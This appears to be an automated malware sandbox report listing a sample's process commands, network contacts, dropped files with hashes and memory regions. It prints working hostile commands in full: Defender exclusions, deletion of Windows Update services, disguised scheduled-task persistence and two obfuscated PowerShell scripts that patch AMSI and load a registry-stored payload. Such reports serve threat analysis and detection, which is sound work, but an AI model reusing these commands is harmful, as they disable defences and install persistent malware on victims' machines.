QBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:wTJHyZJbxkUb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MvzGhpkyQzPqkH,[Parameter(Position=1)][Type]$UVxmlOMZhP)$qweGAJtkNjr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'le'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+'o'+''+[Char](67)+''+'l'+''+[Char](97)+'ss',[MulticastDelegate]);$qweGAJtkNjr.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MvzGhpkyQzPqkH).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');$qweGAJtkNjr.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+'e',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+''+'a'+''+[Char](108)+'',$UVxmlOMZhP,$MvzGhpkyQzPqkH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qweGAJtkNjr.CreateType();}$fcIhnEQmzbYrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+'e'+'m'+'.'+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+[Char](87)+'in'+'3'+'2'+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+'f'+[Char](101)+''+[Char](102)+''+[Char](99)+''+[Char](73)+''+[Char](104)+''+[Char](110)+''+[Char](69)+''+[Char](81)+''+[Char](109)+''+[Char](122)+''+'b'+''+'Y'+''+'r'+''+[Char](104)+'');$WecYCEBNdPzQSk=$fcIhnEQmzbYrh.GetMethod(''+[Char](87)+''+[Char](101)+''+[Char](99)+''+[Char](89)+''+'C'+'E'+[Char](66)+''+'N'+'d'+'P'+''+[Char](122)+''+[Char](81)+''+[Char](83)+''+[Char](107)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bQVeoUInoNwwakCcuRW=wTJHyZJbxkUb @([String])([IntPtr]);$RFObJLYGHEqiGhdyVAtgPu=wTJHyZJbxkUb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KwpKPtCXAtu=$fcIhnEQmzbYrh.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l'+'3'+'2'+[Char](46)+'dl'+[Char](108)+'')));$fkOrMUIxrvYEZx=$WecYCEBNdPzQSk.Invoke($Null,@([Object]$KwpKPtCXAtu,[Object](''+'L'+''+'o'+'adL'+[Char](105)+'b'+'r'+'ar'+[Char](121)+''+'A'+'')));$XNxQjUBDrywwCLXlv=$WecYCEBNdPzQSk.Invoke($Null,@([Object]$KwpKPtCXAtu,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+'al'+[Char](80)+''+'r'+'ote'+[Char](99)+'t')));$MWzCZbe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fkOrMUIxrvYEZx,$bQVeoUInoNwwakCcuRW).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$jVhzLPZyMxIlOheRT=$WecYCEBNdPzQSk.Invoke($Null,@([Object]$MWzCZbe,[Object](''+'A'+'msi'+[Char](83)+'ca'+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$HJvsGquBVN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XNxQjUBDrywwCLXlv,$RFObJLYGHEqiGhdyVAtgPu).Invoke($jVhzLPZyMxIlOheRT,[uint32]8,4,[ref]$HJvsGquBVN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jVhzLPZyMxIlOheRT,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XNxQjUBDrywwCLXlv,$RFObJLYGHEqiGhdyVAtgPu).Invoke($jVhzLPZyMxIlOheRT,[uint32]8,0x20,[ref]$HJvsGquBVN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+'ial'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cdrhgLSawiQf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uZqhZTRTNlqRiV,[Parameter(Position=1)][Type]$zDGWHnZahp)$IEpxuKuIUIQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fle'+[Char](99)+''+[Char](116)+'ed'+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+'e'+''+[Char](84)+'ype','Cla'+'s'+''+[Char](115)+''+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+'C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$IEpxuKuIUIQ.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+'e'+'ci'+'a'+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uZqhZTRTNlqRiV).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$IEpxuKuIUIQ.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+'e'+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'ewS'+[Char](108)+'o'+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$zDGWHnZahp,$uZqhZTRTNlqRiV).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $IEpxuKuIUIQ.CreateType();}$whqaRwycDwDnT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+'.'+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+'.Uns'+[Char](97)+''+[Char](102)+''+'e'+''+[Char](119)+'hqa'+'R'+'w'+[Char](121)+''+'c'+'D'+[Char](119)+''+'D'+''+[Char](110)+''+'T'+'');$xnjeFqrIcEYkTH=$whqaRwycDwDnT.GetMethod(''+[Char](120)+''+[Char](110)+'j'+'e'+''+[Char](70)+'q'+'r'+''+'I'+''+[Char](99)+'EY'+[Char](107)+''+'T'+''+[Char](72)+'',[Reflection.BindingFlags]''+'P'+'ub'+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hEnFzsYWQztxzdoaRLt=cdrhgLSawiQf @([String])([IntPtr]);$OQSNvGvqQDRXujmpdDnnFj=cdrhgLSawiQf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cxaZrHxTOuR=$whqaRwycDwDnT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'eH'+'a'+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+'d'+[Char](108)+''+'l'+'')));$ePkqMyffnIJXVS=$xnjeFqrIcEYkTH.Invoke($Null,@([Object]$cxaZrHxTOuR,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$sGQyUpVDsfQtSAOOW=$xnjeFqrIcEYkTH.Invoke($Null,@([Object]$cxaZrHxTOuR,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+'rote'+'c'+''+[Char](116)+'')));$xTmSAyO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePkqMyffnIJXVS,$hEnFzsYWQztxzdoaRLt).Invoke('a'+'m'+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$AMCRsORNCTqudaCHa=$xnjeFqrIcEYkTH.Invoke($Null,@([Object]$xTmSAyO,[Object](''+'A'+'msi'+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$uhadFPYYFA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sGQyUpVDsfQtSAOOW,$OQSNvGvqQDRXujmpdDnnFj).Invoke($AMCRsORNCTqudaCHa,[uint32]8,4,[ref]$uhadFPYYFA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AMCRsORNCTqudaCHa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sGQyUpVDsfQtSAOOW,$OQSNvGvqQDRXujmpdDnnFj).Invoke($AMCRsORNCTqudaCHa,[uint32]8,0x20,[ref]$uhadFPYYFA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](101)+''+'r'+''+'s'+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a207f7fb-907e-44ba-841f-b0a440ffbcd2}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | connect2me.hopto.org | udp |
| NL | 37.139.129.113:80 | connect2me.hopto.org | tcp |
| US | 8.8.8.8:53 | 113.129.139.37.in-addr.arpa | udp |
| US | 107.182.129.73:8081 | tcp | |
| US | 8.8.8.8:53 | 73.129.182.107.in-addr.arpa | udp |
| US | 20.189.173.2:443 | tcp | |
| US | 13.107.4.50:80 | tcp |
Files
memory/4328-136-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1488-142-0x0000000003230000-0x0000000003266000-memory.dmp
memory/1488-143-0x0000000005910000-0x0000000005F38000-memory.dmp
memory/1488-144-0x00000000031E0000-0x00000000031F0000-memory.dmp
memory/1488-146-0x0000000005F70000-0x0000000005F92000-memory.dmp
memory/1488-145-0x00000000031E0000-0x00000000031F0000-memory.dmp
memory/1488-147-0x0000000006110000-0x0000000006176000-memory.dmp
memory/1488-148-0x0000000006180000-0x00000000061E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqppcr3f.ixk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1488-158-0x0000000006850000-0x000000000686E000-memory.dmp
memory/1488-159-0x0000000006E30000-0x0000000006E62000-memory.dmp
memory/1488-160-0x0000000070D30000-0x0000000070D7C000-memory.dmp
memory/1488-170-0x0000000006E10000-0x0000000006E2E000-memory.dmp
memory/1488-171-0x00000000031E0000-0x00000000031F0000-memory.dmp
memory/1488-172-0x000000007F870000-0x000000007F880000-memory.dmp
memory/1488-173-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/1488-174-0x0000000007B70000-0x0000000007B8A000-memory.dmp
memory/1488-175-0x0000000007BE0000-0x0000000007BEA000-memory.dmp
memory/1488-176-0x0000000007E30000-0x0000000007EC6000-memory.dmp
memory/1488-177-0x0000000007DB0000-0x0000000007DBE000-memory.dmp
memory/1488-178-0x0000000007E00000-0x0000000007E1A000-memory.dmp
memory/1488-179-0x0000000007DF0000-0x0000000007DF8000-memory.dmp
memory/1488-180-0x0000000007F10000-0x0000000007F32000-memory.dmp
memory/1488-181-0x0000000008DE0000-0x0000000009384000-memory.dmp
memory/1488-186-0x00000000031E0000-0x00000000031F0000-memory.dmp
memory/1488-187-0x00000000031E0000-0x00000000031F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 50d48404f9b93a16c69aed2e6c585192 |
| SHA1 | 3f949a4b96bac4f7e1cec881edb5b65295410a1c |
| SHA256 | 0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789 |
| SHA512 | 0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774 |
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 50d48404f9b93a16c69aed2e6c585192 |
| SHA1 | 3f949a4b96bac4f7e1cec881edb5b65295410a1c |
| SHA256 | 0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789 |
| SHA512 | 0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774 |
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 50d48404f9b93a16c69aed2e6c585192 |
| SHA1 | 3f949a4b96bac4f7e1cec881edb5b65295410a1c |
| SHA256 | 0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789 |
| SHA512 | 0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/4892-209-0x0000000000F70000-0x00000000010DC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/4892-216-0x00000000059D0000-0x0000000005A62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/4892-221-0x0000000005EB0000-0x0000000005EBA000-memory.dmp
memory/4892-222-0x0000000005920000-0x0000000005930000-memory.dmp
memory/4892-224-0x0000000005920000-0x0000000005930000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj
| MD5 | 386c014d0948d4fc41afa98cfca9022e |
| SHA1 | 786cc52d9b962f55f92202c7d50c3707eb62607b |
| SHA256 | 448b329f3a10bbe3e8f86cd91509c2783b63d28a375231eb23724f5e141420f2 |
| SHA512 | 13d46209c6b052977d6242763b54ac5e35b389e765c82ba773b520ebf5eacabdfdc22b642cb9760e39ad59dd82fa40a31a8d41fd6dd7ea9c9ad08c57b7d8150f |
memory/1756-239-0x00007FF6C92C0000-0x00007FF6C9680000-memory.dmp
memory/4892-240-0x0000000005920000-0x0000000005930000-memory.dmp
memory/4892-255-0x0000000005920000-0x0000000005930000-memory.dmp
